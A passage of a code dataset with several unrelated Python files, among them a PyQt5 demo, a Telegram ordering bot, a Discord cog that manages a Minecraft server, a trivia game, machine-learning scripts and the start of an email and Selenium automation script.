label\n\t\tmy_label.setFont(qtg.QFont('Helvetica', 24))\n\t\tself.layout().addWidget(my_label)\n\n\t\t# Create an Text box\n\t\tmy_text = qtw.QTextEdit(self,\n\t\t\tplainText=\"This is real text!\",\n\t\t\t#html = \"

Big Header Text!

\",\n\t\t\tacceptRichText= False,\n\t\t\tlineWrapMode=qtw.QTextEdit.FixedColumnWidth,\n\t\t\tlineWrapColumnOrWidth=75,\n\t\t\tplaceholderText=\"Hello World!\",\n\t\t\treadOnly=True,\n\t\t\t)\n\t\t# Change font size of spinbox\n\t\t#my_spin.setFont(qtg.QFont('Helvetica', 18))\n\t\t\n\n\t\t# Put combobox on the screen\n\t\tself.layout().addWidget(my_text)\n\n\t\t# Create a button\n\t\tmy_button = qtw.QPushButton(\"Press Me!\", \n\t\t\tclicked = lambda: press_it())\n\t\tself.layout().addWidget(my_button)\n\n\t\t# Show the app\n\t\tself.show()\n\n\t\tdef press_it():\n\t\t\t# Add name to label\n\t\t\tmy_label.setText(f'You Typed {my_text.toPlainText()}!')\n\t\t\tmy_text.setPlainText(\"You Pressed The Button!\")\n\napp = qtw.QApplication([])\nmw = MainWindow()\n\n# Run The App\napp.exec_()","repo_name":"flatplanet/pyqt5_youtube_playlist","sub_path":"textbox.py","file_name":"textbox.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"73"} +{"seq_id":"28376163631","text":"import datetime\n\nfrom aiogram import types\nfrom aiogram.dispatcher.filters.builtin import CommandStart\nfrom aiogram.types import CallbackQuery, KeyboardButton, ReplyKeyboardMarkup,InlineKeyboardButton,InlineKeyboardMarkup\n\nfrom keyboards.default.menu_uchun import menu_button\nfrom keyboards.default.milliy_taom import taom_button\n\nfrom keyboards.inline.tillar_uchun import till_button\n\n\nfrom loader import dp, base, bot\n\n\n#Menu\n# azolarni qabul qilish\n@dp.message_handler(CommandStart())\nasync def bot_start(message: types.Message):\n ism = message.from_user.first_name\n fam = message.from_user.last_name\n user_id = message.from_user.id\n try:\n base.user_qoshish(ism=ism,fam=fam,username=message.from_user.username,tg_id=user_id)\n except Exception:\n pass\n await message.answer(f\"Salom, Tillarni tanlang {message.from_user.full_name}!\",reply_markup=till_button)\n\n# tillar uchun\n@dp.callback_query_handler(text=\"til1\")\nasync def bot_start(xabar: CallbackQuery):\n await xabar.message.answer(f\"Taomlarni tanlang \",reply_markup=menu_button)\n\n\n\n\n#Taomlar bo'limi buttonlar\nmenular = base.select_all_menu()\n@dp.message_handler(text=[menu[1] for menu in menular])\nasync def bot_start(message: types.Message):\n typee =message.text\n maxsulotlar = base.select_maxsulotlar(turi=typee)\n\n index = 0\n i = 0\n royxat = []\n for menu in maxsulotlar:\n if i % 2 == 0 and i != 0:\n index += 1\n if i % 2 == 0:\n royxat.append([KeyboardButton(text=menu[1])])\n else:\n royxat[index].append(KeyboardButton(text=menu[1]))\n i += 1\n\n royxat.append([KeyboardButton(text=\"Orqaga\")])\n maxsulotlar_buttun = ReplyKeyboardMarkup(keyboard=royxat, resize_keyboard=True)\n\n await message.answer(f\"Maxsulotlarni tanlang, {message.from_user.full_name}!\",reply_markup=maxsulotlar_buttun)\n\n#maxsulotlar\nmenular = base.select_all_maxsulotlar()\n@dp.message_handler(text=[menu[1] for menu in menular])\nasync def bot_start(message: types.Message):\n typee = message.text\n maxsulot = base.select_maxsulotlar(nomi=typee)[0]\n print(maxsulot,'++++++++++++++++++++++')\n #print(maxsulot)\n #(1, 'Osh', 20000, 'https://t.me/meningkanalim1898/2', None, 'Taomlar')\n max_id = maxsulot[0]\n max_nomi = maxsulot[1]\n max_narxi = maxsulot[5]\n max_rasmi = maxsulot[2]\n user_id = message.from_user.id\n await bot.send_photo(chat_id=user_id,photo=max_rasmi,caption=f\"Nomi :{max_nomi}\\n\"\n f\"Narxi : {max_narxi}\",\n reply_markup=InlineKeyboardMarkup(inline_keyboard=[\n [\n InlineKeyboardButton(text=\"Sotib olish\",callback_data=f\"buy {max_id}\")\n ]\n ]\n )\n\n )\n\n#orqaga\n@dp.message_handler(text=\"Orqaga\")\nasync def bot_start(message: types.Message):\n await message.answer(f\"Taomlarni tanlang, {message.from_user.full_name}!\", reply_markup=menu_button)\n\n\n\n@dp.callback_query_handler()\nasync def bot_start(xabar: CallbackQuery):\n data = xabar.data.split()\n if data[0] == 'buy':\n maxsulot_id = data[1]\n maxsulot=base.select_maxsulot(id=maxsulot_id)\n max_nomi = maxsulot[1]\n max_narxi = maxsulot[5]\n max_rasmi = maxsulot[2]\n max_malumot = maxsulot[3]\n max_turi = maxsulot[4]\n max_soni = 1\n user_id = xabar.from_user.id\n user_name=xabar.from_user.username\n date = datetime.datetime.now()\n korzinka = base.select_maxsulot_from_korzinka(nomi=max_nomi,tg_id=user_id)\n print(korzinka)\n if korzinka:\n max_soni = korzinka.soni+1\n base.maxsulot_qoshish_to_korzinka(nomi=max_nomi,tg_id=user_id,narxi=max_narxi,rasm=max_rasmi,turi=max_turi,soni=max_soni,malumot=max_malumot,username=user_name,date=date,status=True)\n\n await xabar.message.answer(f\"Maxsulot Korzinkaga joylandi ! \")\n\n@dp.message_handler(text=\"Korzinka\")\nasync def bot_start (message: types.Message):\n user_id = message.from_user.id\n user_maxsulotlar = base.select_maxsulotlar_from_korzinka(tg_id=user_id)\n\n for maxsulot in user_maxsulotlar:\n # 1, 'Osh', 20000, 'https://t.me/media_uchun596/16', 'Toshkent Oshi', 'Milliy taomlar', 1, 6206058862, '2023-06-05 13:51:23.593051', 1, 'Dobry_one'\n max_id = maxsulot[0]\n max_nomi = maxsulot[1]\n max_narxi = maxsulot[2]\n max_rasmi = maxsulot[3]\n max_soni = maxsulot[6]\n user_id = message.from_user.id\n await bot.send_photo(chat_id=user_id, photo=max_rasmi, caption=f\"Nomi :{max_nomi}\\n\"\n f\"Narxi : {max_narxi}\",\n reply_markup=InlineKeyboardMarkup(inline_keyboard=[\n [\n InlineKeyboardButton(text=\"-\", callback_data=f\"min {max_id}\"),\n InlineKeyboardButton(text=f\"{max_soni}\", callback_data=f\"number {max_id}\"),\n InlineKeyboardButton(text=\"+\", callback_data=f\"plus {max_id}\"),\n\n\n ]\n ]\n )\n\n )\n\n await message.answer(f\"Birinchi taomni tanlang, {message.from_user.full_name}!\", reply_markup=taom_button)\n","repo_name":"dobry61/.gitignore","sub_path":"handlers/users/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12189128982","text":"from superdesk.commands.data_updates import DataUpdate as Update\nfrom superdesk import get_resource_service\n\nSINGLE = 'single selection'\nMULTI = 'multi selection'\nNONE = 'do not show'\n\nselection_map = {\n 'genre': SINGLE,\n 'urgency': SINGLE,\n 'locators': SINGLE,\n 'priority': SINGLE,\n 'footers': SINGLE,\n\n 'iptc_category_map': MULTI,\n 'keywords': MULTI,\n 'categories': MULTI,\n 'default_categories': MULTI,\n 'company_codes': MULTI,\n\n 'desk_types': NONE,\n 'subscriber_types': NONE,\n 'crop_sizes': NONE,\n 'type': NONE,\n 'signal': NONE,\n 'replace_words': NONE,\n 'product_types': NONE,\n 'bom_products': NONE,\n 'contact_job_titles': NONE,\n 'contact_mobile_usage': NONE,\n 'contact_phone_usage': NONE,\n 'annotation_types': NONE,\n 'g2_content_type': NONE,\n 'geographical_restrictions': NONE,\n 'rightsinfo': NONE,\n 'assignment_priority': NONE,\n 'regions': NONE,\n 'countries': NONE,\n 'coverage_providers': NONE,\n 'eventoccurstatus': NONE,\n 'newscoveragestatus': NONE,\n 'event_calendars': NONE\n}\n\n\nclass DataUpdate(Update):\n\n resource = 'vocabularies'\n\n def forwards(self, mongodb_collection, mongodb_database):\n vocabularies_service = get_resource_service('vocabularies')\n for vocabulary in vocabularies_service.get(req=None, lookup=None):\n vocab_id = vocabulary['_id']\n\n mongodb_collection.update({'_id': vocab_id}, {\n '$set': {'selection_type': selection_map.get(vocab_id) or MULTI},\n '$unset': {'single_value': 1}\n })\n\n def backwards(self, mongodb_collection, mongodb_database):\n vocabularies_service = get_resource_service('vocabularies')\n for vocabulary in vocabularies_service.get(req=None, lookup=None):\n single_value = vocabulary.get('selection_type') == 'single selection'\n mongodb_collection.update({'_id': vocabulary['_id']}, {\n '$set': {'single_value': single_value},\n '$unset': {'selection_type': 1}\n })\n","repo_name":"superdesk/superdesk-aap","sub_path":"server/data_updates/00017_20190123-110800_vocabularies.py","file_name":"00017_20190123-110800_vocabularies.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"73"} +{"seq_id":"6670771527","text":"from discord.ext.commands import Cog\nfrom discord.ext.commands import command\nfrom apscheduler.triggers.cron import CronTrigger\nfrom datetime import datetime\n\nimport pexpect\nimport re\n\nfrom ..db import db\n\nserver_status = 0\nansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\nskip_one_cron_cycle = False\n\n\nclass MC(Cog):\n def __init__(self, bot):\n self.bot = bot\n bot.scheduler.add_job(self.check_status, CronTrigger(minute='0,15,30,45'))\n\n global server_status\n try:\n status = (pexpect.run('/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"list\"')).decode()\n p = re.compile(\"Connection failed\")\n if p.match(status): #Server is not live\n server_status = 0\n else:\n server_status = 1\n except:\n pass\n\n\n async def check_status(self):\n global server_status\n global skip_one_cron_cycle\n if server_status == 0 or skip_one_cron_cycle == True:\n skip_one_cron_cycle = False\n return\n else:\n players = pexpect.run('/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"list\"')\n players = players.decode()\n p = re.compile(\"There are (\\d+) of\")\n m = p.match(players)\n online_players = m.group(1)\n if online_players == \"0\": #No one is online, shutdown server\n pexpect.run('/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"say Server is stopping due to inactivity\" save-all stop')\n server_status = 0\n\n @command(name=\"mcstart\")\n async def mcstart(self, ctx):\n global server_status\n global skip_one_cron_cycle\n if server_status == 0:\n try:\n await ctx.send(\"Starting mc server\")\n child = pexpect.spawn('sh')\n child.expect([pexpect.TIMEOUT,'#'])\n\n child.sendline('screen -r')\n child.expect([pexpect.TIMEOUT, '#'])\n\n child.sendline('cd /home/nkeep/minecraft/minecraft_1_19_paper/')\n child.expect([pexpect.TIMEOUT, '#'])\n\n child.sendline('bash start.sh')\n child.expect('Done', timeout = 60)\n\n server_status = 1\n child.sendline('\\001d')\n child.terminate()\n\n skip_one_cron_cycle = True\n await ctx.send(\"mc server started\")\n except:\n await ctx.send(\"Failed to start server\")\n else:\n await ctx.send(\"Sever already running\")\n\n @command(name=\"mclist\")\n async def mclist(self, ctx):\n global server_status\n if server_status == 1:\n try:\n players = pexpect.run('/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"list\"')\n players = players.decode()\n p = re.compile(\"There are (\\d+) of.*online: (.*)\")\n m = p.match(players)\n num_players = m.group(1)\n online_players = m.group(2)\n online_players = ansi_escape.sub('',online_players)\n if num_players == \"0\": \n await ctx.send(\"No players online\")\n else:\n await ctx.send(num_players + \" Players online: \" + online_players)\n except:\n await ctx.send(\"Failed to get list\")\n else:\n await ctx.send(\"Server must be running to use this command. Use mcstart to start server\")\n\n @command(name=\"mcweatherclear\", aliases=[\"mcwc\", \"mctoggledownfall\"])\n async def mcweatherclear(self, ctx):\n await mc_command(ctx, \"weather clear\")\n await ctx.send(\"Cleared weather\")\n\n @command(name=\"mctimeset0\", aliases=[\"mcts0\", \"mctimesetday\", \"mctsd\"])\n async def mctimeset0(self, ctx):\n await mc_command(ctx, \"time set 0\")\n await ctx.send(\"Set time to 0\")\n\n @command(name=\"mccommand\", aliases=[\"mc\"], hidden=True)\n async def mccommand(self, ctx, *, command):\n if ctx.author.id == 143919895694802944:\n await mc_command(ctx, command)\n await ctx.send(\"Success\")\n\n @Cog.listener()\n async def on_ready(self):\n if not self.bot.ready:\n self.bot.cogs_ready.ready_up(\"mc\")\n\nasync def setup(bot):\n\tawait bot.add_cog(MC(bot))\n\nasync def mc_command(ctx, command):\n global server_status\n if server_status == 1:\n try:\n pexpect.run(f'/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"{command}\"')\n except:\n await ctx.send(\"Failed to send command\")\n else:\n await ctx.send(\"Server must be running to use this command. Use mcstart to start server\")","repo_name":"nkeep/Discord_Bot_NatP_Public","sub_path":"lib/cogs/mc.py","file_name":"mc.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42130483338","text":"BLACK = '\\033[30m'\nRED = '\\033[31m'\nGREEN = '\\033[32m'\nYELLOW = '\\033[33m'\nBLUE = '\\033[34m'\nMAGENTA = '\\033[35m'\nCYAN = '\\033[36m'\nWHITE = '\\033[37m'\nRESET = '\\033[39m'\n\nimport random # librería random para el Comodin\nimport time # Importamos la librería time\ncomodin = random.randint(2, 4)\npuntaje = 0\n\niniciar_trivia = True #Variable en True\nintentos = 0 # numero de veces que el usuario intenta la trivia.\n\n# texto de bienvenida\nprint(BLUE+\"Bienvenid@ a mi trivia sobre Inteligencia Artificial\")\nprint(\"Pondré a prueba tus conocimientos con estas 5 preguntas\")\nnombre = input(\"Ingresa tu nombre: \"+RESET)\n\nwhile iniciar_trivia == True:\n\n # Mientras iniciar_trivia:\n intentos += 1\n puntaje = 0\n\n print(GREEN+\"\\nIntento número:\", intentos)\n print(\n \"\\nHola\", nombre,\n \"cada pregunta tendra un valor de 4 puntos + comodin con multiplicador.\\n\"\n )\n print(\n \"Responde las siguientes preguntas escribiendo la letra de la alternativa y presionando 'Enter' para enviar tu respuesta:\\n\"\n )\n input(\"Presiona Enter para continuar\"+RESET)\n time.sleep(1) \n print(MAGENTA+\"\\nEmpezando la trivia...\\n\"+RESET)\n time.sleep(1)\n print(\n YELLOW+\"1) ¿Cuándo se estableció formalmente el término ‘Inteligencia Artificial?\\n\"+RESET\n )\n print(\"a) En 1968, con la película ‘2001: Una odisea en el Espacio’\")\n print(\"b) En 1956, durante la Conferencia de Dartmouth\")\n print(\n \"c) En 1997, después de una computadora autónoma (Deep Blue) ganase al campeón mundial de ajedrez Gari Kaspárov\"\n )\n print(\"d) En 1971, cuando Ray Tomlinson envío el primer email.\")\n respuesta_1 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_1 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_1 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \")\n\n# Verificacion de respuesta\n if respuesta_1 == \"b\":\n puntaje += 4\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n else:\n print(RED+\"\\nIncorrecto\", nombre, \"!\"+RESET)\n\n print(nombre, \"llevas\", puntaje, \"puntos\")\n\n # Pregunta 2\n\n print(YELLOW+\"\\n2) ¿Cuál es la diferencia entre IA débil e IA fuerte?\\n\"+RESET)\n print(\n \"a) La débil está creada para realizar una tarea concreta. La fuerte es capaz de imitar el procesamiento de la información propio de los seres humanos\"\n )\n print(\n \"b) La débil solo lee los labios. La fuerte convierte la voz en texto\"\n )\n print(\n \"c) La débil busca soluciones simples a problemas. La fuerte indaga más profundamente en el problema y aporta respuestas muy elaboradas para programar robots\"\n )\n print(\"d) Ninguna de las anteriores\")\n\n # Almacenamos la respuesta\"\n respuesta_2 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_2 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_2 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \"\n )\n\n# Verificacion de respuesta\n if respuesta_2 == \"b\":\n print(RED+\"\\nIncorrecto!\", nombre, \"!\"+RESET)\n elif respuesta_2 == \"c\":\n print(RED+\"\\nIncorrecto!\", nombre, \"!\"+RESET)\n elif respuesta_2 == \"d\":\n print(RED+\"\\nIncorrecto!\", nombre, \"!\"+RESET)\n else:\n puntaje += 4\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n\n print(nombre, \"llevas\", puntaje, \"puntos\")\n\n # Pregunta 3\n\n print(YELLOW+\n \"\\n3) ¿Qué juego de mesa ha tenido un papel muy importante en el desarrollo de la IA?\\n\"+RESET\n )\n print(\"a) Dominó\")\n print(\"b) Ajedrez\")\n print(\"c) Scrabble\")\n print(\"d) Damas\")\n\n \n respuesta_3 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_3 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_3 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \")\n\n if respuesta_3 == \"b\":\n puntaje += 4\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n else:\n print(RED+\"\\nIncorrecto\", nombre, \"!\"+RESET)\n\n print(nombre, \"llevas\", puntaje, \"puntos\")\n\n # Pregunta 4\n\n print(YELLOW+\"\\n4) ¿En qué se diferencia un programa informático de una IA?\\n\"+RESET)\n print(\n \"a) Un programa informático es solo una lista de órdenes que le dice al ordenador lo que tiene que hacer.\"\n )\n print(\n \"b) La gran revolución de la IA es que no recibe órdenes para obtener un resultado.\"\n )\n print(\n \"c) Con un programa informático, una máquina no piensa. Simplemente, hace exactamente lo que le dicen.\"\n )\n print(\"d) Todas son correctas\")\n respuesta_4 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_4 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_4 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \")\n\n\n if respuesta_4 == \"d\":\n puntaje += 4\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n else:\n print(RED+\"\\nIncorrecto\", nombre, \"!\"+RESET)\n\n print(nombre, \"llevas\", puntaje, \"puntos\")\n\n # Pregunta 5 comodin\n\n print(GREEN+\"\\nPregunta Comodin :)\"+RESET)\n print(YELLOW+\n \"\\n5) Sistemas que piensan como humanos: automatizan actividades como la toma de decisiones, la resolución de problemas y el aprendizaje\\n\"+RESET\n )\n print(\"a) Agentes inteligentes\")\n print(\"b) Robots\")\n print(\"c) Redes neuronales artificiales\")\n print(\"d) Sistemas expertos\")\n respuesta_5 = input(\"\\nTu respuesta: \").lower()\n\n while respuesta_5 not in (\"a\", \"b\", \"c\", \"d\"):\n respuesta_5 = input(\n \"Debes responder a, b, c o d. Ingresa nuevamente tu respuesta: \")\n\n# Verificamos su respuesta para mandar un mensaje de acierto con multilplicador usando random o de error\n if respuesta_5 == \"c\":\n puntaje += 2 * comodin\n print(BLUE+\"\\nMuy bien\", nombre, \"!\"+RESET)\n else:\n print(RED+\"\\nIncorrecto\", nombre, \"!\"+RESET)\n print(MAGENTA+\"\\nGracias\", nombre, \"por jugar mi trivia, alcanzaste\", puntaje,\n \"puntos sobre 20\"+RESET)\n if puntaje >20:\n print(CYAN+\"Sacaste mas de 20 eres un GENIO!\"+RESET)\n elif puntaje > 10:\n print(CYAN+\"Sigue asi lo hiciste muy bien!\"+RESET)\n else:\n print(CYAN+\"No te rindas! Puedes mejorar :)\"+RESET)\n \n print(GREEN+\"\\n¿Deseas intentar la trivia nuevamente?\")\n repetir_trivia = input(\n \"Ingresa 'si' para repetir, o cualquier tecla para finalizar: \").lower(\n )\n\n if repetir_trivia != \"si\": \n print(\"\\nEspero\", nombre, \"que lo hayas pasado bien, hasta pronto!\"+RESET)\n iniciar_trivia = False \n","repo_name":"jfraan/TriviaIA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"10149544007","text":"#!/usr/bin/env python\n#|**********************************************************************;\n# Project : Explainable Deep Driving\n#\n# File name : Step3_1_test_Attention.py\n#\n# Author : Jinkyu Kim\n#\n# Date created : 20181214\n#\n# Purpose : Testing Visual Attention Model \n#\n# Revision History :\n#\n# Date Author Ref Revision\n# 20181214 jinkyu 1 initiated\n#\n# Remark\n#|**********************************************************************;\n\nimport argparse\nimport sys\nimport os\nimport numpy as np\nimport h5py\nimport tensorflow as tf\nfrom collections import namedtuple\nfrom src.utils import *\nfrom src.preprocessor import *\nfrom src.config import *\nfrom src.VA \t import *\nfrom sys import platform\nfrom tqdm import tqdm\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Path viewer')\n parser.add_argument('--getscore', type=bool, default=False, help='get performance scores')\n parser.add_argument('--showvideo', type=bool, default=False, help='show video')\n parser.add_argument('--useCPU', type=bool, default=False, help='without GPU processing')\n parser.add_argument('--validation', type=bool, default=False, help='use validation set')\n parser.add_argument('--gpu_fraction', type=float, default=0.7, help='GPU usage limit')\n parser.add_argument('--extractAttn', type=bool, default=True, help='extract attention maps')\n args = parser.parse_args()\n\n if platform == 'darwin':\n args.model = \"./model/VA/model-0.ckpt\"\n args.savepath = \"./result/VA/\"\n config.timelen = 400+3\n timelen = 400\n config.batch_size = 1\n else:\n raise NotImplementedError\n\n if args.getscore: check_and_make_folder(args.savepath)\n if args.extractAttn: check_and_make_folder(config.h5path + \"attn/\")\n\n # prepare datasets\n if args.validation: filenames = os.path.join(config.h5path, 'val.txt' )\n else: filenames = os.path.join(config.h5path, 'train.txt')\n\n with open(filenames, 'r') as f:\n fname = ['%s'%x.strip() for x in f.readlines()]\n\n # Create VA model\n VA_model = VA(alpha_c=config.alpha_c)\n alphas, y_acc, y_course = VA_model.inference()\n\n if args.useCPU: # Use CPU only\n tfconfig = tf.ConfigProto( device_count={'GPU':0}, intra_op_parallelism_threads=1)\n sess = tf.Session(config=tfconfig)\n else: # Use GPU\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_fraction)\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n # Preprocessor\n pre_processor = PreProcessor_VA(timelen=timelen, phase='test')\n\n # Load the pretrained model\n saver = tf.train.Saver()\n if args.model is not None:\n saver.restore(sess, args.model)\n print(\"\\rLoaded the pretrained model: {}\".format(args.model))\n\n for dataset in tqdm(fname):\n print(bcolors.HIGHL+\"Dataset: {}\".format(dataset)+bcolors.ENDC)\n\n log = h5py.File(config.h5path + \"log/\" + dataset + \".h5\", \"r\")\n feats = h5py.File(config.h5path + \"feat/\"+ dataset + \".h5\", \"r\")\n cam = h5py.File(config.h5path + \"cam/\" + dataset + \".h5\", \"r\")\n nImg = cam['X'].shape[0]\n nFeat = feats['X'].shape[0]\n\n # initialization\n feat_batch = np.zeros((timelen, 64, 12, 20))\n curvature_batch = np.zeros((timelen, 1))\n accel_batch = np.zeros((timelen, 1))\n speed_batch = np.zeros((timelen, 1))\n course_batch = np.zeros((timelen, 1))\n goaldir_batch = np.zeros((timelen, 1))\n timestamp_batch = np.zeros((timelen, 1))\n\n # preprocess logs\n feat_batch[:nFeat] = feats['X'][:]\n timestamp_batch[:nFeat] = preprocess_others(log[\"timestamp\"][:], nImg)[3:]\n curvature_batch[:nFeat] = preprocess_others(log[\"curvature\"][:], nImg)[3:] \n accel_batch[:nFeat] = preprocess_others(log[\"accelerator\"][:], nImg)[3:] \n speed_batch[:nFeat] = preprocess_others(log[\"speed\"][:], nImg)[3:] \n course_batch[:nFeat] = preprocess_course(log[\"course\"][:], nImg)[3:] \n goaldir_batch[:nFeat] = preprocess_others(log[\"goaldir\"][:], nImg)[3:]\n\n # Preprocessing for tensorflow\n feat_p, _, acc_p, speed_p, course_p, _, goaldir_p, _ = pre_processor.process(\n \t\tsess=sess, \n \t\tinImg=np.expand_dims(np.array(feat_batch),0), \n \t\tcourse=np.expand_dims(np.array(course_batch),0), \n \t\tspeed=np.expand_dims(np.array(speed_batch),0), \n \t\tcurvature=np.expand_dims(np.array(curvature_batch),0), \n \t\taccelerator=np.expand_dims(np.array(accel_batch),0), \n \t\tgoaldir=np.expand_dims(np.array(goaldir_batch),0) )\n\n # Run a model\n feed_dict = {VA_model.features: feat_p,\n VA_model.speed: speed_p,\n VA_model.goaldir: goaldir_p}\n alps, pred_accel, pred_courses = sess.run([alphas, y_acc, y_course], feed_dict)\n alps = np.squeeze(alps)\n\n if args.extractAttn:\n print(config.h5path + \"attn/\" + dataset + \".h5\")\n f = h5py.File(config.h5path + \"attn/\" + dataset + \".h5\", \"w\")\n dset = f.create_dataset(\"/attn\", data=alps, chunks=(20,240))\n dset = f.create_dataset(\"/timestamp\",data=timestamp_batch, chunks=(20,1))\n dset = f.create_dataset(\"/curvature\",data=curvature_batch, chunks=(20,1))\n dset = f.create_dataset(\"/accel\", data=accel_batch, chunks=(20,1))\n dset = f.create_dataset(\"/speed\", data=speed_batch, chunks=(20,1))\n dset = f.create_dataset(\"/course\", data=course_batch, chunks=(20,1))\n dset = f.create_dataset(\"/goaldir\", data=goaldir_batch, chunks=(20,1))\n dset = f.create_dataset(\"/pred_accel\", data=np.expand_dims(pred_accel,1), chunks=(20,1))\n dset = f.create_dataset(\"/pred_courses\", data=np.expand_dims(pred_courses,1), chunks=(20,1))\n\n # Total Result\n print(bcolors.HIGHL + 'Done' + bcolors.ENDC)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"JinkyuKimUCB/explainable-deep-driving","sub_path":"Step3_1_test_Attention.py","file_name":"Step3_1_test_Attention.py","file_ext":"py","file_size_in_byte":6032,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"73"} +{"seq_id":"37849644236","text":"import pandas as pd \r\nimport numpy as np \r\n\r\ndataset = pd.read_csv(\"C:/Users/Hemal/Desktop/BDA Semester-3/Machine Learning-2/Python/petrol_consumption.csv\") \r\n\r\ndataset.head()\r\ndataset.describe() \r\n\r\nX = dataset.drop('Petrol_Consumption', axis=1) \r\ny = dataset['Petrol_Consumption'] \r\n\r\nfrom sklearn.model_selection import train_test_split \r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) \r\n\r\nfrom sklearn.tree import DecisionTreeRegressor \r\nregressor = DecisionTreeRegressor() \r\nregressor.fit(X_train, y_train) \r\ny_pred = regressor.predict(X_test) \r\n\r\ndf=pd.DataFrame({'Actual':y_test, 'Predicted':y_pred}) \r\nprint(df) \r\n\r\nfrom sklearn import metrics \r\nprint('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_pred)) \r\nprint('Mean Squared Error:', metrics.mean_squared_error(y_test, y_pred)) \r\nprint('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_pred))) \r\n\r\n","repo_name":"shrddha-p-jain/Machine-Learning-Assignments","sub_path":"DecisionTreeRegression.py","file_name":"DecisionTreeRegression.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"20832564284","text":"\"\"\" Test utilities for Resilient \"\"\"\n\n\ndef verify_subset(expected, actual):\n \"\"\"Test that the values match, where expected can be a subset of actual\"\"\"\n if isinstance(expected, dict):\n assert isinstance(actual, dict)\n for (key, value) in expected.items():\n verify_subset(value, actual.get(key))\n elif isinstance(expected, list):\n assert isinstance(actual, list)\n for evalue, avalue in zip(expected, actual):\n verify_subset(evalue, avalue)\n else:\n assert expected == actual\n","repo_name":"ibmresilient/resilient-python-api","sub_path":"pytest-resilient-circuits/pytest_resilient_circuits/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"73"} +{"seq_id":"28873458477","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 30 18:26:05 2020\r\n\r\n@author: Matthieu\r\n\"\"\"\r\n\r\n\r\nglobal retour\r\n\r\n\r\n##############################################################################\r\n### DECLARATION DES CLASS ET DES FONCTIONS\r\n##############################################################################\r\ndef envoiMail(destinataire, objet, corps, cc):\r\n email_source = \"email@source.fr\"\r\n \r\n from win32com.client import Dispatch\r\n Outlook = Dispatch('Outlook.application')\r\n mail = Outlook.CreateItem(0)\r\n mail.SentOnBehalfOfName=email_source\r\n mail.To = destinataire\r\n mail.CC = email_source+cc\r\n mail.Subject = objet\r\n mail.GetInspector\r\n\r\n index = mail.HTMLbody.find('>', mail.HTMLbody.find('
Nous constatons le problème suivant : \" + probleme+\" sur la(les) chaine(s) : \" + chaine+\".\"\r\n if (commentaire!=\"\"):\r\n corps+=\"
Information complémentaire : \"+commentaire\r\n corps+=\"
Nous avons ouvert l’incident : \"+ticket+\".

Pouvez-vous investiguer sur la cause de ce problème ?\"\r\n\r\n envoiMail(destinataire, objet, corps, cc)\r\n\r\n\r\n\r\ndef rechercheListePartenaire():\r\n from csv import reader\r\n partenaire=[]\r\n \r\n with open('partenaire.csv') as csv_file:\r\n csv_reader = reader(csv_file, delimiter=';')\r\n for row in csv_reader:\r\n partenaire.append(row[0])\r\n \r\n return partenaire[1:]\r\n\r\n\r\n\r\ndef rechercheMailPartenaire(partenaire):\r\n from csv import reader\r\n \r\n with open('partenaire.csv') as csv_file:\r\n csv_reader = reader(csv_file, delimiter=';')\r\n\r\n for row in csv_reader:\r\n if (partenaire in row):\r\n return row[1],row[2]\r\n\r\n return [\"\",\"\"]\r\n\r\n\r\n\r\ndef declenchementOrange(mdp, numeroTT, chaine, zap, probleme, commentaire, typeIncident, qualite):\r\n url_fournisseur=\"URL\"\r\n user=\"user\"\r\n num_telephone=\"0100000000\"\r\n prestation=\"prestation\"\r\n \r\n \r\n from selenium.webdriver import 